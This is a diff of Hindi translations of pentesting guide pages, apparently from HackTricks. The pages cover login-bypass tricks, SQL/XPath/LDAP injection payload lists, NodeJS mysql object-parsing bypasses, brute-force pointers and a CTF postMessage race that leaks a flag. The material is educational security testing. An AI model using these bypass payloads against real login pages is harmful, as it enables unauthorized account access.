* **PHP तुलना त्रुटि की जांच करें:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b` * **PHP तुलना त्रुटि जांचें:** `user[]=a&pwd=b` , `user=a&pwd[]=b` , `user[]=a&pwd[]=b`
* **सामग्री प्रकार को json में बदलें** और json मान (bool true समेत) भेजें * **कंटेंट प्रकार को json में बदलें** और json मान भेजें (bool true समाविष्ट)
* यदि आपको पोस्ट का जवाब मिलता है कि पोस्ट समर्थित नहीं है, तो आप `Content-Type: application/json` के साथ GET अनुरोध के साथ JSON को शरीर में भेजने की कोशिश कर सकते हैं * यदि आपको एक प्रतिक्रिया मिलती है जो कहती है कि POST समर्थित नहीं है तो आप `Content-Type: application/json` के साथ GET अनुरोध के साथ **शरीर में JSON भेजने की कोशिश कर सकते हैं**
* नोडजेएस की संभावित पार्सिंग त्रुटि की जांच करें (इसे पढ़ें [**यह**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1` * नोडजेएस की संभावित पार्सिंग त्रुटि की जांच करें (इसे पढ़ें [**यह**](https://flattsecurity.medium.com/finding-an-unseen-sql-injection-by-bypassing-escape-functions-in-mysqljs-mysql-90b27f6542b4)): `password[password]=1`
* नोडजेएस उस पेलोड को निम्नलिखित क्वेरी के लिए एक क्वेरी में बदल देगा: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` जिससे पासवर्ड बिट हमेशा सच हो जाएगा। * नोडजेएस उस payload को एक क्वेरी में बदल देगा जो निम्नलिखित के समान होगी: ` SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` `` `**`password=password=1`**`;` जिससे पासवर्ड बिट हमेशा सच हो जाएगा।
* यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं, तो आप लॉगिन को बाईपास करने के लिए `"password":{"password": 1}` भेज सकते हैं। * यदि आप एक JSON ऑब्जेक्ट भेज सकते हैं तो आप लॉगिन को बायपास करने के लिए `"password":{"password": 1}` भेज सकते हैं।
* ध्यान दें कि इस लॉगिन को बाईपास करने के लिए आपको अभी भी **एक मान्य उपयोगकर्ता नाम जानने और भेजने की आवश्यकता है** * ध्यान रखें कि इस लॉगिन को बायपास करने के लिए आपको अब भी **एक मान्य उपयोगकर्ता का पता करना और भेजना** होगा
* `mysql.createConnection` को बुलाने के समय `"stringifyObjects":true` विकल्प जोड़ने से अंततः **जब पैरामीटर में `Object` पास किया जाता है**, सभी अप्रत्याशित व्यवहारों को ब्लॉक कर देगा। * `mysql.createConnection` को बुलाते समय **"stringifyObjects":true** विकल्प जोड़ना आखिरकार सभी अप्रत्याशित व्यवहारों को ब्लॉक कर देगा जब `Object` पैरामीटर में पास किया जाएगा।
* क्रेडेंशियल्स की जांच करें: * क्रेडेंशियल्स की जांच करें:
* उपयोग की गई तकनीक/प्लेटफॉर्म के [**डिफ़ॉल्ट क्रेडेंशियल्स**](../../generic-methodologies-and-resources/brute-force.md#default-credentials) * उपयोग की गई प्रौद्योगिकी/प्लेटफ़ॉर्म के [**डिफ़ॉल्ट क्रेडेंशियल्स**](../../generic-methodologies-and-resources/brute-force.md#default-credentials)
* **सामान्य कॉम्बिनेशन** (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी पासवर्ड के साथ डिफ़ॉल्ट उपयोगकर्ता)। * **सामान्य कॉम्बिनेशन** (रूट, एडमिन, पासवर्ड, तकनीक का नाम, इनमें से किसी एक के साथ डिफ़ॉल्ट उपयोगकर्ता).
* **Cewl** का उपयोग करके एक शब्दकोश बनाएं, **डिफ़ॉल्ट** उपयोगकर्ता नाम और पासवर्ड (यदि हो) * **Cewl** का उपयोग करके एक शब्दकोश बनाएं, **डिफ़ॉल्ट** उपयोगकर्ता नाम और पासवर्ड जोड़ें (यदि है) और सभी शब्दों का उपयोग करके उपयोगकर्ता नाम और पासवर्ड के रूप में ब्रूट-फोर्स करने की कोशिश करें
* **बड़े शब्दकोश का उपयोग करके ब्रूट-फोर्स** करें ([**ब्रूट फोर्स**](../../generic-methodologies-and-resources/brute-force.md#http-post-form)**)**
### SQL Injection प्रमाणीकरण बायपास
[यहाँ आप **SQL इंजेक्शन** के माध्यम से लॉगिन को बायपास करने के कई तरीके पाएंगे](../sql-injection/#authentication-bypass)।
निम्नलिखित पृष्ठ पर आप एक **कस्टम सूची पाएंगे जिसे आप लॉगिन को बायपास करने की कोशिश करने के लिए प्रयास कर सकते हैं** SQL इंजेक्शन के माध्यम से:
{% content-ref url="sql-login-bypass.md" %}
[sql-login-bypass.md](sql-login-bypass.md)
{% endcontent-ref %}
### No SQL Injection प्रमाणीकरण बायपास
[यहाँ आप **No SQL इंजेक्शन** के माध्यम से लॉगिन को बायपास करने के कई तरीके पाएंगे](../nosql-injection.md#basic-authentication-bypass)**।**
क्योंकि NoSQL इंजेक्शन को पैरामीटर मान को बदलने की आवश्यकता होती है, आपको उन्हें मैन्युअल रूप से टेस्ट करने की आवश्यकता होगी।
### XPath Injection प्रमाणीकरण बायपास
[यहाँ आप **XPath इंजेक्शन** के माध्यम से लॉगिन को बायपास करने के कई तरीके पाएंगे](../xpath-injection.md#authentication-bypass)।
``` ```
' or '1'='1 ' or '1'='1
' or ''=' ' or ''='
@ -52,9 +73,9 @@
admin' or ' admin' or '
admin' or '1'='2 admin' or '1'='2
``` ```
### LDAP Injection प्रमाणीकरण बापास ### LDAP Injection प्रमाणीकरण बापास
[यहां आपको **LDAP Injection** के माध्यम से लॉगिन बाइपास करने के कई ट्रिक्स मिलेंगे।](../ldap-injection.md#login-bypass) [यहाँ आप कई तरह के ट्रिक्स पा सकते हैं जिनका उपयोग करके **LDAP Injection** के माध्यम से लॉगिन को बायपास किया जा सकता है।](../ldap-injection.md#login-bypass)
``` ```
* *
*)(& *)(&
@ -68,35 +89,15 @@ admin)(!(&(|
pwd)) pwd))
admin))(|(| admin))(|(|
``` ```
### मुझे याद रखें ### याद रखें
अगर पेज में "**मुझे याद रखें**" की सुविधा है, तो देखें कि यह कैसे लागू किया गया है और क्या आप इसका दुरुपयोग करके **अन्य खातों को हासिल कर सकते हैं** अगर पेज में "**याद रखें**" की कार्यक्षमता है तो देखें कि यह कैसे लागू किया गया है और क्या आप इसका दुरुपयोग करके **अन्य खातों को अधिकार में ले** सकते हैं
### रीडायरेक्ट ### रीडायरेक्ट
पेज आमतौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करता है, देखें कि क्या आप उस रीडायरेक्ट को बदलकर [**ओपन रीडायरेक्ट**](../open-redirect.md) का कारण बना सकते हैं। शायद आप कुछ जानकारी (कोड, कुकीज...) चुरा सकते हैं अगर आप उपयोगकर्ता को अपनी वेबसाइट पर रीडायरेक्ट करते हैं। पेज आम तौर पर लॉगिन के बाद उपयोगकर्ताओं को रीडायरेक्ट करते हैं, देखें कि क्या आप उस रीडायरेक्ट को बदलकर [**ओपन रीडायरेक्ट**](../open-redirect.md) का कारण बना सकते हैं। शायद आप कुछ जानकारी (कोड, कुकीज...) चुरा सकते हैं अगर आप उपयोगकर्ता को अपनी वेबसाइट पर रीडायरेक्ट करते हैं।
## अन्य जांचें ## अन्य जांचें
* लॉगिन की सुविधा का दुरुपयोग करके आप **उपयोगकर्ता नामों की गणना** कर सकते हैं। * जांचें कि क्या आप लॉगिन कार्यक्षमता का दुरुपयोग करके **उपयोगकर्ता नामों की गणना** कर सकते हैं।
* जांचें कि क्या पासवर्ड/**संवेदनशील** जानकारी **फॉर्म** के **इनपुट** में **ऑटो-पूरा** सक्रिय है: `<input autocomplete="false"` * जांचें कि क्या **ऑटो-पूर्ण** पासवर्ड/**संवेदनशील** जानकारी **फॉर्म** में सक्रिय है **इनपुट:** `<input autocomplete="false"`
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा इवेंट है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** की मिशन के साथ, यह कांग्रेस हर विषय में टेक्नोलॉजी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबलता हुआ मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>

View file

@ -1,14 +1,14 @@
# वेब वल्न सूची # वेब सुरक्षा सूची
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन हैकट्रिक्स में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं या PEASS को डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **ट्विटर** पर [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके * **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
```python ```python
@ -54,10 +54,10 @@ javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembe
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का उपयोग करना चाहते हैं PEASS या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** का **पालन** करें
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें PRs जमा करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**.
</details> </details>

View file

@ -1,28 +1,28 @@
# मुख्य पृष्ठ को ब्लॉक करके postmessage चोरी करना # डालना मुख्य पृष्ठ को ब्लॉक करना postmessage चुराने के लिए
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें [hacktricks repo](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud) में।** * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके**।
</details> </details>
## Iframes के साथ RC जीतना ## Iframes के साथ RCs जीतना
इस [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710) के अनुसार, नल उत्पन्न किए गए ब्लॉब निर्दिष्ट मूल्यों से सुरक्षा के लाभ के लिए अलग होते हैं, जिसका मतलब है कि यदि आप मुख्य पृष्ठ को व्यस्त रखते हैं, तो iframe पृष्ठ को निष्पादित किया जाएगा। इस [**Terjanq writeup**](https://gist.github.com/terjanq/7c1a71b83db5e02253c218765f96a710) के अनुसार, नल उत्पत्तियों से बनाए गए ब्लॉब दस्तावेज सुरक्षा लाभों के लिए अलग होते हैं, जिसका मतलब है कि यदि आप मुख्य पृष्ठ को व्यस्त रखते हैं, तो आईफ्रेम पृष्ठ को निष्पादित किया जाएगा।
मूल रूप से उस चुनौती में एक **अलग किया गया iframe निष्पादित** होता है और उसके **बाद** जब यह **लोड हो जाता है**, **माता** पृष्ठ **एक post** संदेश भेजेगा जिसमें **ध्वज** होगा।\ मूल रूप से उस चुनौती में एक **अलग आईफ्रेम निष्पादित** होता है और **उसके बाद** यह **लोड** होता है, **मुख्य** पृष्ठ **एक पोस्ट** संदेश भेजेगा जिसमें **ध्वज** होगा।\
हालांकि, यह postmessage संचार **XSS के लिए संकटग्रस्त है** (यह **iframe** JS कोड निष्पादित कर सकता है)। हालांकि, इस postmessage संचार में **XSS के लिए वंशानुगत** है (आईफ्रेम JS कोड निष्पादित कर सकता है)।
इसलिए, हमलावर का उद्देश्य है कि **माता iframe बनाए**, लेकिन **पहले** ही **माता** पृष्ठ को **व्यस्त रखें** और **पेलोड** को **iframe** में **भेजें**। जबकि **माता व्यस्त होता है**, **iframe पेलोड निष्पादित करता है** जो **माता postmessage संदेश सुनेगा और ध्वज छिपाएगा**।\ इसलिए, हमले करने वाले का लक्ष्य है कि **मुख्य आईफ्रेम बनाएं**, लेकिन **पहले** **मुख्य** पृष्ठ को **व्यस्त रखें** और **आईफ्रेम को पेश करने से पहले** **मुख्य** पृष्ठ **संवेदनशील डेटा (ध्वज) भेजें** के लिए **इसे व्यस्त रखें** और **आईफ्रेम को पेश करें**। जब तक **मुख्य व्यस्त है**, **आईफ्रेम पेश करेगा** जो कुछ JS होगा जो **मुख्य postmessage संदेश के लिए सुनेगा और ध्वज लीक करेगा**।\
अंत में, iframe ने पेलोड निष्पादित कर दिया है और माता पृष्ठ व्यस्त नहीं रहता है, इसलिए यह ध्वज भेजता है और पेलोड इसे लीक करता है। अंततः, आईफ्रेम ने पेलोड निष्पादित किया है और मुख्य पृष्ठ व्यस्त होना बंद कर दिया है, इसलिए वह ध्वज भेजता है और पेलोड इसे लीक करता है।
लेकिन कैसे करें आप माता को **व्यस्त रखें जब वह iframe उत्पन्न करता है और जब वह इसे संवेदनशील डेटा भेजने के लिए तैयार हो रहा है?** मूल रूप से, आपको माता **निष्पादित** करने के लिए **असिंक्रोन** क्रिया ढूंढनी होगी। उदाहरण के लिए, उस चुनौती में माता **postmessages** को ऐसे **सुन रहा था**: लेकिन आप मुख्य को **व्यस्त कैसे बना सकते हैं जिसे उसने आईफ्रेम उत्पन्न किया है और बस जब वह आईफ्रेम को तैयार होने का इंतजार कर रहा है, तब**? मूल रूप से, आपको **व्यस्त** **क्रिया** ढूंढनी होगी जिसे आप मुख्य **निष्पादित** कर सकते हैं। उदाहरण के लिए, उस चुनौती में मुख्य **postmessages** को इस तरह सुन रहा था:
```javascript ```javascript
window.addEventListener('message', (e) => { window.addEventListener('message', (e) => {
if (e.data == 'blob loaded') { if (e.data == 'blob loaded') {
@ -30,21 +30,9 @@ $("#previewModal").modal();
} }
}); });
``` ```
तो यह संभव था कि एक **बड़ी पूर्णांक को postmessage में भेजा जाए**, जो उस तुलना में **स्ट्रिंग में परिवर्तित होगा**, जिसमें कुछ समय लगेगा: इसलिए एक **बड़ा पूर्णांक postmessage में भेजना संभव था** जो उस तुलना में **स्ट्रिंग में परिवर्तित** होगा, जिससे कुछ समय लगेगा:
```bash ```bash
const buffer = new Uint8Array(1e7); const buffer = new Uint8Array(1e7);
win?.postMessage(buffer, '*', [buffer.buffer]); win?.postMessage(buffer, '*', [buffer.buffer]);
``` ```
और उस **पोस्टमैसेज** को सटीक और **भेजने** के लिए, आपको **आईफ्रेम** बनाए जाने के **बाद** लेकिन जब यह पेयरेंट से डेटा प्राप्त करने के लिए **तैयार** होने के **पहले** ही **`setTimeout`** के मिलीसेकंड के साथ **खेलने** की आवश्यकता होगी। और सटीक होने के लिए और **पोस्टमैसेज** को **भेजने** के लिए आपको **आईफ्रेम** बनाए जाने के ठीक बाद और डेटा पेयरेंट से डेटा प्राप्त करने के लिए तैयार होने से **पहले** आपको **`setTimeout`** के मिलीसेकंड के साथ खेलने की आवश्यकता होगी।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PRs के माध्यम से [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में सबमिट करें।**
</details>

View file

@ -1,20 +1,20 @@
# Iframes के साथ SOP को बाइपास करना - 1 # Iframes में SOP को छलकरना - 1
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का एक्सेस चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह अनन्य [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
